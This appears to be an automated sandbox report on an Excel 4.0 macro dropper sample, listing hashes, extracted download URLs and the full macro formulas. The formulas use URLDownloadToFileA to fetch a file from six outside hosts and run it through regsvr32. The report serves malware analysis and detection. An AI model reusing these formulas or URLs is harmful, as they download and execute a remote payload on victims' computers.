General

  • Target

    1a440a4f6ddae2e450a5cad8967993839b8bd70dbc525e0d5ab1620266c2dc53

  • Size

    40KB

  • Sample

    241120-xa5grasakm

  • MD5

    efc25e011f5fbefa0395cf751d193831

  • SHA1

    4095c138a07dca840c8c6ee99eef29b9c5c6f1e0

  • SHA256

    1a440a4f6ddae2e450a5cad8967993839b8bd70dbc525e0d5ab1620266c2dc53

  • SHA512

    413aee74aa79f7a9efa1246a98fb7b5b5ae082e75bf4af355ae0ff468a3226241e1a0c580e06c3685c023b50fe3eaf8566186b6ccba37212e2ba07e3c4a4d956

  • SSDEEP

    768:lqoOomihd8DOevZCwtofyKfcrND59V+L9Rw4eWrXcTqZ0VfIeg:TOom8eDGylND59V4jwmXc2CVfIb

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://asempaye.com/404/zREXldL8ZfpsEepiC/

https://freesoft18.com/urq/dd1s9WyDLkdM/

https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/

https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/

https://pedroribeiro.work/wp-admin/qOkQQ/

https://hojeemdia.life/detector/klwHgC9eat/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://asempaye.com/404/zREXldL8ZfpsEepiC/","..\dan.ocx",0,0)
    =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://freesoft18.com/urq/dd1s9WyDLkdM/","..\dan.ocx",0,0))
    =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/","..\dan.ocx",0,0))
    =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/","..\dan.ocx",0,0))
    =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pedroribeiro.work/wp-admin/qOkQQ/","..\dan.ocx",0,0))
    =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hojeemdia.life/detector/klwHgC9eat/","..\dan.ocx",0,0))
    =IF('EFALGV'!D20<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\dan.ocx")
    =RETURN()

Extracted

Language
xlm4.0

    Source           URLs
    xlm40.dropper    https://asempaye.com/404/zREXldL8ZfpsEepiC/
    xlm40.dropper    https://freesoft18.com/urq/dd1s9WyDLkdM/
    xlm40.dropper    https://vidarefugio.com/wp-content/AQj7kZUR8VcKYOe/
    xlm40.dropper    https://rjssjharkhand.com/wp-content/NEenGg5UHA24gnZAlYj/
    xlm40.dropper    https://pedroribeiro.work/wp-admin/qOkQQ/
    xlm40.dropper    https://hojeemdia.life/detector/klwHgC9eat/

Extracted

Language
xlm4.0

    Source           URLs
    xlm40.dropper    https://asempaye.com/404/zREXldL8ZfpsEepiC/

Targets

    • Target

      1a440a4f6ddae2e450a5cad8967993839b8bd70dbc525e0d5ab1620266c2dc53

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks